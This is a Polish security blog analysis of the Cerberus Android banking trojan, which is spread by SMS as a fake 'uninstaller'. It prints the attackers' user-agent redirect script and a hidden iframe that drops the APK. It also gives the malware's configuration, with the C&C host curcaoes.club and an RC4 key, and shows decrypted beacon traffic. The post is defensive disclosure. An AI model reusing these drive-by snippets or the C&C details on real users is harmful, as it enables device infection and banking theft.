Banker Cerberus pod szyldem „deinstalatora”
Zgodnie z wczorajszą obietnicą wracamy do analizy złośliwego oprogramowania, rozpowszechniającego się przez SMS od nadawcy „WrozbySMS”, z „deinstalatorem” nieistniejącej aplikacji. Użytkownik, przekonany socjotechnicznie, że zainstalował sobie aplikację, korzystanie z której miałoby go kosztować 30 złotych (skoro mowa o subskrypcji to zapewne miesięcznie).
Zaczyna się od SMSa z nadpisu Wrozby SMS, zawierającego link z URL hxxp://wrozbyonline.net/wrozby, „po drodze” przekierowujący na stronę w domenie .pl. W kodzie strony, odpowiedzialnym za przekierowanie, widać, że złośliwa aktywność podejmowana jest wyłącznie w przypadku stwierdzenia, iż ofiara otwiera link na telefonie z systemem Android.
<script type=”text/javascript”>
var isMobile = {
Android: function() {
return navigator.userAgent.match(/Android/i);
},
BlackBerry: function() {
return navigator.userAgent.match(/BlackBerry/i);
},
iOS: function() {
return navigator.userAgent.match(/iPhone|iPad|iPod/i);
},
Opera: function() {
return navigator.userAgent.match(/Opera Mini/i);
},
Windows: function() {
return navigator.userAgent.match(/IEMobile/i);
},
any: function() {
return (isMobile.Android() || isMobile.BlackBerry() || isMobile.iOS() || isMobile.Opera() || isMobile.Windows());
}
};
if ( isMobile.Android() ) {
document.location.href=”download.html”;
}else{
document.location.href=”https://www.wrozbyonline.pl„;
}
</script>
Ostateczne przekierowanie następuje na stronę wrozbyonline.net/download.html
<iframe width=”1″ height=”1″ frameborder=”0″ src=”sklepjubilerski.apk”></iframe>
Skąd finalnie pobierana jest złośliwa aplikacja:
hxxp://wrozbyonline.net/sklepjubilerski.apk
Aby zainstalować aplikację należy w opcjach telefonu zezwolić na instalację z nieznanych źródeł. Aplikacje spoza sklepu Play nie instalują się automatycznie (wymagają zmiany ustawień przez użytkownika)
W momencie analizy wirus rozpoznawalny był przez siedem silników antywirusów pod różnymi nazwami.
- AhnLab-V3 Trojan/Android.Banker.896466
- Avast-Mobile Android:Evo-gen [Trj]
- Avira (no cloud) ANDROID/Dropper.FRGT.Gen
- CAT-QuickHeal Android.Agent.GEN32502
- DrWeb Android.BankBot.2311
- F-Secure Malware.ANDROID/Dropper.FRGT.Gen
- Fortinet Android/Agent.DVL!tr
- Ikarus Trojan-Banker.AndroidOS.Cerberus
- K7GW Trojan ( 0055e1561 )
- Kaspersky HEUR:Trojan-Dropper.AndroidOS.Hqwar.bp
- ZoneAlarm by Check Point HEUR:Trojan-Dropper.AndroidOS.Hqwar.bp
Z samych uprawnień pliku APK wygląda, iż jego funkcjonalność polega na kradzieży SMS’ów przychodzących na zainfekowany telefon, co wynika z uprawnień, zawartych w pliku AndroidManifest.xml:
- odczyt kontaktów
- wykonywanie połączeń
- dostęp do internetu
- wskaźnik baterii
- wysyłanie wiadomości SMS
- odczyt SMS
- odczyt informacji o stanie urządzenia (dane sieci, numer telefonu, status połączeń)
Aplikacja instaluje się jak zwykła aplikacja na Androida. Bez wątpienia czerwoną lampkę u użytkownika powinien zapalić fakt, iż jako „deinstalator” instalujemy aplikację… Sklep Jubilerski.
 |  |
Co więcej, po zainstalowaniu aplikacji otwiera się okno z monitem proszącym o włączenie rzekomej „Ochrony Telefonu” (przypominamy, iż aplikacja nosi nazwę Sklep Jubilerski!). Przestępcy chcą przekonać ofiarę, iż jest to niezbędne, by aplikacja w pełni działała na telefonie, a tak naprawdę umożliwia to wirusowi uzyskanie dalszych, znacznie szerszych uprawnień niezbędnych do efektywnego działania.
 |  |
Oczywiście aplikację znajdziemy również w systemowym menedżerze aplikacji.
Dalsza analiza wykazuje iż mamy do czynienia z Cerberusem – bardzo popularnym tzw. bankerem na smartfony, służącym do wykradania haseł dostępowych, loginów do aplikacji bankowych i SMSów autoryzacyjnych. Robi to głównie za pomocą nakładek (ang. overlay) przysłaniających ekran i podszywających się pod bank. Kod do wstrzyknięcia nakładki pobierany jest z zewnętrznego serwera, podczas gdy wirus jest uruchomiony na zainfekowanym telefonie. Złośliwe oprogramowanie w kodzie posiada funkcjonalność dynamicznie ładujących się modułów.
Poniżej została przestawiona konfiguracja wraz z widocznym kluczem RC4, służącym do szyfrowania i odszyfrowania przesyłanych danych między zainfekowanym telefonem a serwerem Command&Control:
<?xml version=’1.0′ encoding=’utf-8′ standalone=’yes’ ?>
<map>
<int name=”lastVersionCodeUsed” value=”2357121″ />
</map>
<?xml version=’1.0′ encoding=’utf-8′ standalone=’yes’ ?>
<map>
<string name=”idbot”>a4jd56tj3fbx58211</string>
<string name=”lockDevice”>0</string>
<string name=”timeMails”>-1</string>
<string name=”timeWorking”>1096</string>
<string name=”statCards”>0</string>
<string name=”urlAdminPanel”>http://curcaoes.club</string>
<string name=”LogSMS”>BLOCK DISABLE ACCESIBILITY SERVICE::endLog::</string>
<string name=”activeDevice”>0</string>
<string name=”nameInject”></string>
<string name=”packageNameDefultSmsMenager”>com.android.mms</string>
<string name=”activityAccessibilityVisible”>1</string>
<string name=”urls”></string>
<string name=”autoClick”>1</string>
<string name=”old_start_inj”>0</string>
<string name=”app_inject”></string>
<string name=”timestop”>0</string>
<string name=”goOffProtect”></string>
<string name=”display_width”>1080</string>
<string name=”logsContacts”></string>
<string name=”packageNameActivityInject”>qujfnblzgcdjxqsmnua.biitilrludzi.ascxgxmtwcfaksdqtgzypd.indvy.opxvzpqjw</string>
<string name=”actionSettingInection”></string>
<string name=”statDownloadModule”>0</string>
<string name=”arrayInjection”></string>
<string name=”offSound”>0</string>
<string name=”timeProtect”>-1</string>
<string name=”listSaveLogsInjection”></string>
<string name=”activeInjection”>0</string>
<string name=”statAccessibilty”>1</string>
<string name=”killApplication”></string>
<string name=”timeInject”>-1</string>
<string name=”checkupdateInjection”></string>
<string name=”whileStartUpdateInection”></string>
<string name=”getIdentifier”>1234567890</string>
<string name=”packageName”>lhsp.zcbyngoqjpbbzpq.hqbcbmtz</string>
<string name=”initialization”>good</string>
<string name=”day1PermissionSMS”>1</string>
<string name=”startpush”></string>
<string name=”keylogger”></string>
<string name=”checkProtect”>2</string>
<string name=”starterService”></string>
<string name=”schetAdmin”>90</string>
<string name=”getPermissionsToSMS”></string>
<string name=”dataKeylogger”></string>
<string name=”statusInstall”></string>
<string name=”inj_start”>0</string>
<string name=”statMails”>0</string>
<string name=”logsSavedSMS”></string>
<string name=”idSettings”></string>
<string name=”schetBootReceiver”>90</string>
<string name=”step”>0</string>
<string name=”statBanks”>0</string>
<string name=”statProtect”>0</string>
<string name=”hiddenSMS”></string>
<string name=”logsApplications”></string>
<string name=”key”>sfhdfhwerkhgjfgh</string>
<string name=”timeCC”>-1</string>
<string name=”display_height”>1920</string>
<string name=”statAdmin”>0</string>
<string name=”startInstalledTeamViewer”>1</string>
<string name=”kill”></string>
</map>
Jak wskazuje kod, malware pozwala atakującemu nie tylko na podglądanie smsów, ale także danych logowania do banków, treści maili i wiele więcej. W trakcie analizy uruchomiono w środowisku odizolowanym komunikację telefonu z C&C pod adresem curcaoes.club. Poniższy proces przedstawia odszywfowanie przesyłanych danych.
Przykładowa zaszyfrowana komunikacja po wcześniejszym zdekodowaniu base64:
619afaf2c4d6eafc61d88b329376bb31b03deb18bf9cc351da42b7f5b177a76f76d057
19645a25ee2a852aa7e969c92da15a5ae84ab35217b4cd7e4e8067ae9dc5f15cc89
4030938842806b343c34f92dec141b2cc6586c50a060cbc82a23ca23d0409921393
7566d33fe3f183c4b709f763e491c3425c2aac18c8fea1e0e02563b7db4f090a58327
69b026dba0d7c17d400a2536e7c0a66b7b8b3a8ddbcd4ddac19a252430d59c634e
2380be395039c7af066acda0d8e4f0c31fbb3b14e572322f17fc3c0aadfd4d6e5b871
22453a162cf3a4a94e41f53bf71a89947ce19f7c99af952c04d2188f7ada32770fcab0
c4070fe3a5a6d31751a74c027ed90ed2ad024867fe5ca83cf63d1cba40788fe6fa950
000a7c2
Po zdekodowaniu przy użyciu klucza RC4 „sfhdfhwerkhgjfgh” ciąg wygląda tak:
7B 22 69 64 22 3A 22 67 70 69 62 38 6D 64 69 34 63 61 73 75 37 68 76 68 22 2C 22 69 64 53 65 74 74 69 6E 67 73 22 3A 22 22 2C 22 73 74 61 74 41 64 6D 69 6E 22 3A 22 30 22 2C 22 73 74 61 74 50 72 6F 74 65 63 74 22 3A 22 32 22 2C 22 73 74 61 74 53 63 72 65 65 6E 22 3A 22 31 22 2C 22 73 74 61 74 41 63 63 65 73 73 69 62 69 6C 74 79 22 3A 22 31 22 2C 22 73 74 61 74 53 4D 53 22 3A 22 30 22 2C 22 73 74 61 74 43 61 72 64 73 22 3A 22 30 22 2C 22 73 74 61 74 42 61 6E 6B 73 22 3A 22 30 22 2C 22 73 74 61 74 4D 61 69 6C 73 22 3A 22 30 22 2C 22 61 63 74 69 76 65 44 65 76 69 63 65 22 3A 22 30 22 2C 22 74 69 6D 65 57 6F 72 6B 69 6E 67 22 3A 22 31 32 30 22 2C 22 73 74 61 74 44 6F 77 6E 6C 6F 61 64 4D 6F 64 75 6C 65 22 3A 22 30 22 2C 22 62 61 74 74 65 72 79 4C 65 76 65 6C 22 3A 22 31 30 30 22 2C 22 6C 6F 63 61 6C 65 22 3A 22 70 6C 22 7D
Ostatecznie odszyfrowany wynik końcowy transmisji do C&C wygląda tak:
{„id”:”gpib8mdi3casu7hvh”,”idSettings”:””,”statAdmin”:”0″,”statProtect”:”2″,”statScreen”:”1″,
„statAccessibilty”:”1″,”statSMS”:”0″,”statCards”:”0″,”statBanks”:”0″,”statMails”:”0″,
„activeDevice”:”0″,”timeWorking”:”120″,”statDownloadModule”:”0″,”batteryLevel”:”100″,
„locale”:”pl”}
Co robić?
Akurat w opisywanym przypadku wystarczy zdrowy rozsądek – po pierwsze pod Androidem nie ma konieczności „instalancji deinstalatora”, poza tym – jak wspominaliśmy wyżej – ostatecznym szlabanem przed instalacją tego typu aplikacji powinna być nazwa, „Sklep Jubilerski”. W przypadku lepiej przygotowanego phishingu, warto pamiętać o jednej, najistotniejszej zasadzie – instalacja czegokolwiek spoza oficjalnych sklepów to proszenie się o problemy.
Nie dajcie się okraść.
